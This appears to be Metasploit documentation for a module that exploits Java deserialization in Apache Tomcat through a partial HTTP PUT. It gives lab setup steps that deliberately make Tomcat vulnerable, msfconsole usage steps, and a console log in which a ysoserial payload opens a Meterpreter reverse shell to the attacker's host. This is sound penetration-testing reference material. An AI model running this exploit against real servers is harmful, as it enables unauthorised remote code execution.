adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c23c848d2eeffa5a01dfdcdafa63340002b06eb9
metasploit-gs/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
T
Jack Heysel b85faf9440 Update documentation
2025-04-02 14:10:46 -07:00

5.2 KiB
Raw Blame History

Vulnerable Application

This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality that can be exploited with a partial HTTP PUT request to place an attacker controlled deserialization payload in the <tomcat_root_dir>/webapps/ROOT/ directory. For the exploit to succeed, writes must be enabled for the default servlet, and org.apache.catalina.session.PersistentManager must be configured to use org.apache.catalina.session.FileStore.

Setup

Download Ubuntu Server 24: wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso

Install ubuntu on your preferred hypervisor, enable SSH during installation. Reboot once installation is complete and SSH into the target. Download Tomcat and Java:

wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz

Extract the JDK Archive to the appropriate directory:

tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
sudo mkdir -p /opt/java
sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8

Install unzip and extract Tomcat:

sudo apt install unzip -y
sudo unzip apache-tomcat-9.0.90.zip -d /opt/

Set CATALINA_HOME and JAVA_HOME also update PATH by adding the following to ~/.bashrc:

export CATALINA_HOME=/opt/apache-tomcat-9.0.90
export JAVA_HOME=/opt/java/zulu8
export PATH=$JAVA_HOME/bin:$PATH

Apply changes:

source ~/.bashrc

Change Tomcat permissions:

sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin

Edit conf/web.xml and update the default servlet with the following:

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

Edit conf/content.xml and add the following inside the pre-existing <Context> tags:

    <Manager className="org.apache.catalina.session.PersistentManager">
      <Store className="org.apache.catalina.session.FileStore" />
    </Manager>

Create the following directory inside the tomcat root directory:

mkdir -p webapps/ROOT/WEB-INF/lib
cd ./webapps/ROOT/WEB-INF/lib

Download the following dependencies:

wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar

Start the vulnerable Tomcat instance:

cd /opt/apache-tomcat-9.0.90/bin
./startup.sh

Options

GADGET

The desired ysoserial gadget to use to obtain RCE.

Verification Steps

  1. Start msfconsole
  2. use multi/http/tomcat_partial_put_deserialization
  3. set RHOST <TARGET_IP_ADDRESS>
  4. set RPORT <TARGET_PORT>
  5. set GADGET <YSOSERIAL_GADGET>
  6. set LHOST eth0
  7. check
  8. exploit

Scenarios

Apache Tomcat 9.0.90, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command

msf6 > use multi/http/tomcat_partial_put_deserialization
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
[+] 172.16.199.130:8080 - The target is vulnerable.
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
[*] Attempting to deserialize session file..
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 172.16.199.130
[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfserver
OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink